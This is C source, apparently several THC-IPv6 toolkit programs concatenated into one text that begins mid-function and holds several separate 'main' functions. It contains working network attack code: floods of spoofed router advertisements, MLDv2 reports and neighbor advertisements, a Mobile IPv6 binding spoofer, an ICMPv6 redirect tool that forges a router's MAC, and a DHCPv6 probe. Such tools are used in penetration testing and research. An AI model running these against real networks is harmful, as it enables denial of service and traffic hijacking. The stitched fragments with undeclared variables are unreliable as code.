routerip6[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
memcpy(route6, routerip6, 8);
memcpy(&buf[32], route6, 16);
memcpy(&buf[50], mac6, 6);
count++;
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
return -1;
}
if (do_frag) {
if (type == NXT_ICMP6)
type = NXT_FRAG;
for (i = 0; i < do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
return -1;
if (do_dst) {
thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len);
hdr = (thc_ipv6_hdr *) pkt;
thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + 14, hdr->pkt_len - 40 - 14, 1240);
} else {
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
perror("");
return -1;
}
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 100 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL;
unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
int pkt1_len = 0, rawmode = 0;
unsigned int id = 2, i;
char *interface;
thc_ipv6_hdr *hdr;
if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
h = thc_resolve6(argv[2]);
ha = thc_resolve6(argv[3]);
coa = thc_resolve6(argv[4]);
if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
for (i = 0; i < 4; i++) {
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 2;
buf[4] = 201;
buf[5] = 16;
memcpy(&buf[6], h, 16);
buf_len = 22;
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
return -1;
hdr = (thc_ipv6_hdr *) pkt1;
hdr->original_src = h;
if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
return -1;
memset(buf, 0, sizeof(buf));
buf[0] = 59;
buf[1] = 3;
buf[2] = 5;
buf[3] = 0;
buf[6] = (id % 65536) / 256;
buf[7] = id % 256;
buf[8] = 192;
buf[10] = 0xff;
buf[11] = 0xff;
buf[12] = 1;
buf[14] = 3;
buf[15] = 16;
memcpy(&buf[16], coa, 16);
buf_len = 32;
if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
return -1;
thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len);
id += 16384;
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)];
unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst);
int i, j;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
int count = 0;
if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
mac[0] = 0x00;
mac[1] = 0x18;
ip6[9] = mac[1];
memset(buf, 0, sizeof(buf));
buf[0] = 5;
buf[1] = 2;
memset(buf2, 0, sizeof(buf2));
for (i = 0; i < RECORD_NUMBER; i++) {
buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE
buf2[3 + i * 36] = 1;
buf2[4 + i * 36] = 0xff;
buf2[5 + i * 36] = 0x02;
memcpy(buf2 + 20 + i * 36, ip6, 16);
}
printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
while (1) {
for (i = 0; i < 4; i++)
mac[2 + i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
for (i = 0; i < RECORD_NUMBER; i++) {
for (j = 0; j < 6; j++)
buf2[14 + j + i * 36] = rand() % 256;
memcpy(buf2 + 29 + i * 36, ip6 + 9, 7);
}
count++;
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
// fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
// perror("");
// return -1;
printf("!");
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 100 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6;
unsigned char buf[24];
unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
int i;
unsigned char *pkt = NULL;
int pkt_len = 0, flags, rawmode = 0, count = 0;
if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
ip6 = malloc(16);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6, 0, 16);
ip6[0] = 0xfe;
ip6[1] = 0x80;
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
memset(buf, 0, sizeof(buf));
buf[16] = 2;
buf[17] = 1;
buf[18] = mac[0];
buf[19] = mac[1];
memcpy(buf, ip6, 16);
printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
count++;
memcpy(buf + 10, ip6 + 10, 6);
memcpy(&buf[20], mac + 2, 4);
flags = ICMP6_NEIGHBORADV_OVERRIDE;
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
perror("");
return -1;
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 100 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt = NULL, buf[16], mac[16] = "";
unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac;
thc_ipv6_hdr *ipv6;
char *interface;
int pkt_len, rawmode = 0, ttl = 64, offset = 14;
if (argc < 6 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
src6 = thc_resolve6(argv[2]);
target6 = thc_resolve6(argv[3]);
oldrouter6 = thc_resolve6(argv[4]);
if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]);
exit(-1);
}
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
/* Spoof source mac */
if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
exit(-1);
}
if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
fprintf(stderr, "Error: could not resolve mac address for original-router\n");
free(self6);
exit(-1);
}
if (rawmode == 0) {
if (argc >= 7)
sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
}
if (argc >= 8)
ttl = atoi(argv[7]);
if (ttl <= 0 || ttl > 255)
ttl = 64;
memset(buf, 'A', 16);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Can not send packet, exiting ...\n");
exit(-1);
}
usleep(25000);
ipv6 = (thc_ipv6_hdr *) pkt;
thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
ipv6->pkt[offset + 7] = (unsigned char) ttl;
thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14);
printf("Sent ICMPv6 redirect for %s\n", argv[3]);
free(self6);
free(fakemac);
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
char wdatabuf[1024], wdatabuf2[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
len2 = sizeof(inforeq);
memcpy(wdatabuf2, inforeq, len2);
printf("Sending DHCPv6 Solicitate message ...\n");
printf("Sending DHCPv6 Information Request message ...\n");
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
if (!use_real_mac)
memcpy(wdatabuf2 + 18, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
printf("!");
signal(SIGALRM, clean_exit);
alarm(3);
// i = thc_send_pkt(interface, pkt, &pkt_len);
pkt = thc_destroy_packet(pkt);
while (1) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
return 0; // never reached
}
void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
unsigned char *ipv6hdr, *pkt, buf[1500];
int len = header->caplen, pkt_len = 0;
unsigned int *seq, offset = 0;
unsigned short int *orig, *seen;
thc_ipv6_hdr hdr;
if (debug) {
printf("DEBUG: packet received\n");
thc_dump_data((unsigned char *)data, len, "Received packet on tunnel");
}
if (type == 2) { // 6in4
len -= do_hdr_size;
ipv6hdr = (unsigned char*) (data + do_hdr_size);
if ((ipv6hdr[0] & 240) != 0x60)
return;
if (len < 48 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[41] != 0)
return;
seq = (unsigned int *) (ipv6hdr + 44);
if (ipv6hdr[40] == ICMP6_PINGREQUEST) {
printf("Keep-alive ping request ID 0x%x seen\n", htonl(*seq));
if (passive == 0) {
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, ipv6hdr + 24, ipv6hdr + 8, 255, 0, 0, 0, 0)) == NULL)
return;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, htonl(*seq), (unsigned char *) ipv6hdr + 40 + 8, len - 40 - 8, 0) < 0)
return;
if (thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0)
return;
pkt = thc_destroy_packet(pkt);
printf("Keep-alive ping reply ID 0x%x sent\n", htonl(*seq));
}
}
if (passive && ipv6hdr[40] == ICMP6_PINGREPLY)
printf("Keep-alive ping reply ID 0x%x seen\n", htonl(*seq));
} else { // PPPoE
seen = (unsigned short int *) (data + 20 + offset + do_hdr_off);
if (len < 40 || len > 1500 || htons(*seen) != 0xc021)
return;
seen = (unsigned short int *) (data + 16 + offset + do_hdr_off);
if (memcmp(data + 16 + offset + do_hdr_off, do_hdr + 16 + offset + do_hdr_off, 2) != 0) {
orig = (unsigned short int*) (do_hdr + 16 + offset + do_hdr_off);
fprintf(stderr, "Warning: PPPoE SessionID is different to that defined in the environment variable! ((specified) %04x != %04x (seen))\n", htons(*orig), htons(*seen));
}
if (data[22 + offset + do_hdr_off] == 9) {
printf("Keep-alive request ID 0x%04x seen\n", htons(*seen));
if (passive == 0) {
memcpy(buf + 12, data + 12, len - 12);
memcpy(buf + 6, data, 6);
memcpy(buf, data + 6, 6);
buf[22 + offset + do_hdr_off] = 10;
hdr.pkt = buf;
hdr.pkt_len = len;
if (thc_send_pkt(interface, (unsigned char*) &hdr, &len) < 0) {
fprintf(stderr, "Error: could not send packet to interface %s (%d)\n", interface, thc_socket);
exit(-1);
}
printf("Keep-alive reply ID 0x%04x sent\n", htons(*seen));
}
} else {
if (passive && data[22 + offset + do_hdr_off] == 10)
printf("Keep-alive reply ID 0x%04x seen\n", htons(*seen));
}
}
return;
}
